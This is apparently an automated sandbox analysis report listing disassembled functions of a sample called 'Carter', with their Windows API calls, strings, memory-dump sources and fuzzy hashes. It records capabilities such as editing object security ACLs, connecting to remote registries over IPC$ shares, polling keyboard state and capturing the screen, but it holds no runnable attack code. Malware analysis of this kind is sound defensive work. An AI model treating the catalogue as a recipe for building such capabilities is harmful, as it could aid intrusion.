Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C7C8A4
GetFocus.USER32 ref: 00C7C8B4
GetDlgCtrlID.USER32(00000000), ref: 00C7C8BF
_memset.LIBCMT ref: 00C7C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C7CA15
GetMenuItemCount.USER32(?), ref: 00C7CA35
GetMenuItemID.USER32(?,00000000), ref: 00C7CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C7CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C7CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C7CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C7CB31

Strings

0, xrefs: 00C7C9E2

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: fd7f668ce25d919e3bbc12013391e3843a291313c381568ac88229241f8e71d7
Instruction ID: 94862e216eab24a4fb5887ec9732735f00c8c0c81673d10b018fa430a1415df0
Opcode Fuzzy Hash: fd7f668ce25d919e3bbc12013391e3843a291313c381568ac88229241f8e71d7
Instruction Fuzzy Hash: 47817D716083069FDB10CF14C885A6BBBE8FF88354F10852DF9A9A3291D730DE45DBA2

Function 00C48ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C48E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C48E3C
Part of subcall function 00C48E20: GetLastError.KERNEL32(?,00C48900,?,?,?), ref: 00C48E46
Part of subcall function 00C48E20: GetProcessHeap.KERNEL32(00000008,?,?,00C48900,?,?,?), ref: 00C48E55
Part of subcall function 00C48E20: HeapAlloc.KERNEL32(00000000,?,00C48900,?,?,?), ref: 00C48E5C
Part of subcall function 00C48E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48E73

Part of subcall function 00C48EBD: GetProcessHeap.KERNEL32(00000008,00C48916,00000000,00000000,?,00C48916,?), ref: 00C48EC9
Part of subcall function 00C48EBD: HeapAlloc.KERNEL32(00000000,?,00C48916,?), ref: 00C48ED0
Part of subcall function 00C48EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C48916,?), ref: 00C48EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C48B2E
_memset.LIBCMT ref: 00C48B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C48B62
GetLengthSid.ADVAPI32(?), ref: 00C48B73
GetAce.ADVAPI32(?,00000000,?), ref: 00C48BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C48BCC
GetLengthSid.ADVAPI32(?), ref: 00C48BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C48BF8
HeapAlloc.KERNEL32(00000000), ref: 00C48BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C48C20
CopySid.ADVAPI32(00000000), ref: 00C48C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C48C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C48C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C48C92

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: ae1115c6c59a813165a2973b19ef92c2a9c06d17d2f05127770551d7c2f8bea6
Instruction ID: e3d1e84c0171b58a3691adb040887c2280cd2e84cb830ba246779233dab55c1b
Opcode Fuzzy Hash: ae1115c6c59a813165a2973b19ef92c2a9c06d17d2f05127770551d7c2f8bea6
Instruction Fuzzy Hash: 3E61477590020AEFDF10DFA4DC85FEEBBB9FF04300F148169E925A6290DB359A09DB60

Function 00C67A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C67A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C67A85
CreateCompatibleDC.GDI32(?), ref: 00C67A91
SelectObject.GDI32(00000000,?), ref: 00C67A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C67AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C67B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C67B52
SelectObject.GDI32(00000006,?), ref: 00C67B5A
DeleteObject.GDI32(?), ref: 00C67B63
DeleteDC.GDI32(00000006), ref: 00C67B6A
ReleaseDC.USER32(00000000,?), ref: 00C67B75

Strings

(, xrefs: 00C67AFA

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 7d530da4c9f2de78d64fa8428010750d03415d927cdf6f12961a811a34acb550
Instruction ID: 93197d459af2c4f9234fbb5c3c8c07b12f8008420823108583e289408a44811e
Opcode Fuzzy Hash: 7d530da4c9f2de78d64fa8428010750d03415d927cdf6f12961a811a34acb550
Instruction Fuzzy Hash: C3515871904209EFCB24CFA8CC85FAEBBB9EF48710F14891DF95AA7250D731A9459B60

Function 00C5A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C5A4D4

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00C5A4F6
__swprintf.LIBCMT ref: 00C5A54F
__swprintf.LIBCMT ref: 00C5A568
_wprintf.LIBCMT ref: 00C5A61E
_wprintf.LIBCMT ref: 00C5A63C

Strings

"%s" (%d) : ==> %s:, xrefs: 00C5A637
Line %d (File "%s"):, xrefs: 00C5A549, 00C5A562
"%s" (%d) : ==> %s:%s%s, xrefs: 00C5A619
Error: , xrefs: 00C5A5E6
^ ERROR, xrefs: 00C5A5C0

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 74e7631fd41d07c27f31b1c0f85e0d520beb3c253f321941d9b927629334b72c
Instruction ID: 2266bdae84863f2c65c76241050c9e5f172737cc9069ac9c64b3b43b06e2e618
Opcode Fuzzy Hash: 74e7631fd41d07c27f31b1c0f85e0d520beb3c253f321941d9b927629334b72c
Instruction Fuzzy Hash: DE51A071900119ABCF15EBE0CD86FEEB778AF14341F140265F905B21A2EB316F98EB65

Function 00C59710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5951A: __time64.LIBCMT ref: 00C59524

Part of subcall function 00C04A8C: _fseek.LIBCMT ref: 00C04AA4

__wsplitpath.LIBCMT ref: 00C597EF

Part of subcall function 00C1431E: __wsplitpath_helper.LIBCMT ref: 00C1435E

_wcscpy.LIBCMT ref: 00C59802
_wcscat.LIBCMT ref: 00C59815
__wsplitpath.LIBCMT ref: 00C5983A
_wcscat.LIBCMT ref: 00C59850
_wcscat.LIBCMT ref: 00C59863

Part of subcall function 00C59560: _memmove.LIBCMT ref: 00C59599
Part of subcall function 00C59560: _memmove.LIBCMT ref: 00C595A8

_wcscmp.LIBCMT ref: 00C597AA

Part of subcall function 00C59CF1: _wcscmp.LIBCMT ref: 00C59DE1
Part of subcall function 00C59CF1: _wcscmp.LIBCMT ref: 00C59DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C59A0D
_wcsncpy.LIBCMT ref: 00C59A80
DeleteFileW.KERNEL32(?,?), ref: 00C59AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C59ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C59ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C59AEF

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: e38ff85c871ee7a744943e224aef415b3a499deb7821732356ed0a93e013d6f6
Instruction ID: 612a3bdbac11f108cc5849904de5f588974473978769fc722f06b0fc604c7409
Opcode Fuzzy Hash: e38ff85c871ee7a744943e224aef415b3a499deb7821732356ed0a93e013d6f6
Instruction Fuzzy Hash: D4C15DB1D00219AACF15DF95CC85ADEB7BDEF45310F0040AAFA09E7151EB709A88EF65

Function 00C05BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C05BF1
GetMenuItemCount.USER32(00CB7890), ref: 00C40E7B
GetMenuItemCount.USER32(00CB7890), ref: 00C40F2B
GetCursorPos.USER32(?), ref: 00C40F6F
SetForegroundWindow.USER32(00000000), ref: 00C40F78
TrackPopupMenuEx.USER32(00CB7890,00000000,?,00000000,00000000,00000000), ref: 00C40F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C40F97

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 6e999b502a4432043860a118509ec39bcddfd9328cfb339fdcdfc1cafd49c33e
Instruction ID: 9c225970b3b6bd6dff4edc1bfb350ddb9ee9f878abe21617f62929acd902b397
Opcode Fuzzy Hash: 6e999b502a4432043860a118509ec39bcddfd9328cfb339fdcdfc1cafd49c33e
Instruction Fuzzy Hash: 32710330684705BFFB208B55DC85FAABF64FF05724F200216FA246A2D1C7B16964DFA8

Function 00C483FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

_memset.LIBCMT ref: 00C48489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C484BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C484DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C484F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C48520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C48548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C48553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C48558

Strings

\IPC$, xrefs: 00C484A0
SOFTWARE\Classes\, xrefs: 00C4842A
\CLSID, xrefs: 00C48440

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: b8c254aa21ba34ebd472888495814cfcb1a1d86ce3750d5c647355f407577a3d
Instruction ID: cce2effa0ce753c7430ea20ecac5a1d8525db339dcff82c922c6dcdc4318dce4
Opcode Fuzzy Hash: b8c254aa21ba34ebd472888495814cfcb1a1d86ce3750d5c647355f407577a3d
Instruction Fuzzy Hash: 2941E672D1022DAFDF12EBA4DC95EEDB778FF04350F044129E915A21A1EB319E08DB90

Function 00C7147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7040D,?,?), ref: 00C71491

Strings

HKEY_LOCAL_MACHINE, xrefs: 00C714FA
HKEY_CURRENT_CONFIG, xrefs: 00C7154E
HKCR, xrefs: 00C71539
HKLM, xrefs: 00C7150F
HKEY_CURRENT_USER, xrefs: 00C71570
HKU, xrefs: 00C715A3
HKEY_USERS, xrefs: 00C71592
HKCU, xrefs: 00C71581
HKCC, xrefs: 00C7155F
HKEY_CLASSES_ROOT, xrefs: 00C71524

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 85562f493a70e68204b709a5b5e52395a5923d56da0ffee62752ea215873030c
Instruction ID: 33bca32c0151d69edd7364724867dc7047244079f0201a19dbf97f6edb94e9f7
Opcode Fuzzy Hash: 85562f493a70e68204b709a5b5e52395a5923d56da0ffee62752ea215873030c
Instruction Fuzzy Hash: B6416F7061025ACBDF04EF94E881AEE3764BF53304F688415FC665B292DB70EE59EB50

Function 00C55882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

Part of subcall function 00C0153B: _memmove.LIBCMT ref: 00C015C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C558EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C55901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C55912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C55924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C55935

Strings

status PlayMe mode, xrefs: 00C558E6
open , xrefs: 00C5589A
play PlayMe wait, xrefs: 00C5591F
alias PlayMe, xrefs: 00C558C4
play PlayMe, xrefs: 00C55930
close PlayMe, xrefs: 00C558FC, 00C55929

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: fd3570a1f890e1d5ffcef17b742fbbbeefd169761d2590af9cffd478468372f7
Instruction ID: 7619f0abbeed8ee3fb9e63227fce23bca17d513943a85b69de5cb8888ce922c9
Opcode Fuzzy Hash: fd3570a1f890e1d5ffcef17b742fbbbeefd169761d2590af9cffd478468372f7
Instruction Fuzzy Hash: 1811EB3154115EB9DB10A7A1DC5ADFFBB7CEFD2B50F440439BC11920E2DE601E45C5A0

Function 00C54C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C54C27
gethostname.WSOCK32(?,00000100), ref: 00C54C41
gethostbyname.WSOCK32(?), ref: 00C54C4E
_wcscpy.LIBCMT ref: 00C54C76
_memmove.LIBCMT ref: 00C54C89
inet_ntoa.WSOCK32(?), ref: 00C54C94
_strcat.LIBCMT ref: 00C54CA2
_wcscpy.LIBCMT ref: 00C54CB9
WSACleanup.WSOCK32 ref: 00C54CC7
_wcscpy.LIBCMT ref: 00C54CD5

Strings

0.0.0.0, xrefs: 00C54C70

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 6e8d65d279b9b963f2d2605b901e1440293fb307fdd3327405a7dd15358d683d
Instruction ID: 0d108e6a2ff82d739e564d615dbda6d2055fd181e6b2d58bebeda5e2efb3e6a3
Opcode Fuzzy Hash: 6e8d65d279b9b963f2d2605b901e1440293fb307fdd3327405a7dd15358d683d
Instruction Fuzzy Hash: 6F118C35904118AFCB54B7749C4AFEE77BCDF81715F1401B5F80492092EF70AACAAB58

Function 00C55530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C55535

Part of subcall function 00C1083E: timeGetTime.WINMM(?,00000002,00BFC22C), ref: 00C10842

Sleep.KERNEL32(0000000A), ref: 00C55561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00C55585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C555A7
SetActiveWindow.USER32 ref: 00C555C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C555D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C555F3
Sleep.KERNEL32(000000FA), ref: 00C555FE
IsWindow.USER32 ref: 00C5560A
EndDialog.USER32(00000000), ref: 00C5561B

Strings

BUTTON, xrefs: 00C55599

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 5836e5b85d51d8cd3d6647ae0b2c935d87e878ed3eaa71ced4b7452a22fdff30
Instruction ID: aabab00686e549509fd81fda63c88c8b66a7d59e2e789345936f5341b685f11a
Opcode Fuzzy Hash: 5836e5b85d51d8cd3d6647ae0b2c935d87e878ed3eaa71ced4b7452a22fdff30
Instruction Fuzzy Hash: A321C674244645AFF7906B60EC99B2D3B6EEB44346F501124F801812A1DF719D9CDB7E

Function 00C5DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

CoInitialize.OLE32(00000000), ref: 00C5DC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C5DCC0
SHGetDesktopFolder.SHELL32(?), ref: 00C5DCD4
CoCreateInstance.OLE32(00C83D4C,00000000,00000001,00CAB86C,?), ref: 00C5DD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C5DD8F
CoTaskMemFree.OLE32(?,?), ref: 00C5DDE7
_memset.LIBCMT ref: 00C5DE24
SHBrowseForFolderW.SHELL32(?), ref: 00C5DE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C5DE83
CoTaskMemFree.OLE32(00000000), ref: 00C5DE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C5DEC1
CoUninitialize.OLE32(00000001,00000000), ref: 00C5DEC3

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 009ae96dfe3f6784227cfbd427ed3812e4000fbc708fd0e7e96728ee17ff81cc
Instruction ID: f868ffa4d8544f047874e993443536ecc00a2b8db8c82738cb3eb08ff0f8befc
Opcode Fuzzy Hash: 009ae96dfe3f6784227cfbd427ed3812e4000fbc708fd0e7e96728ee17ff81cc
Instruction Fuzzy Hash: ABB1FE75A00209AFDB14DF64C889DAEB7F9FF48305F148499E90AEB251DB30EE85CB54

Function 00C5081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C50896
SetKeyboardState.USER32(?), ref: 00C50901
GetAsyncKeyState.USER32(000000A0), ref: 00C50921
GetKeyState.USER32(000000A0), ref: 00C50938
GetAsyncKeyState.USER32(000000A1), ref: 00C50967
GetKeyState.USER32(000000A1), ref: 00C50978
GetAsyncKeyState.USER32(00000011), ref: 00C509A4
GetKeyState.USER32(00000011), ref: 00C509B2
GetAsyncKeyState.USER32(00000012), ref: 00C509DB
GetKeyState.USER32(00000012), ref: 00C509E9
GetAsyncKeyState.USER32(0000005B), ref: 00C50A12
GetKeyState.USER32(0000005B), ref: 00C50A20

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
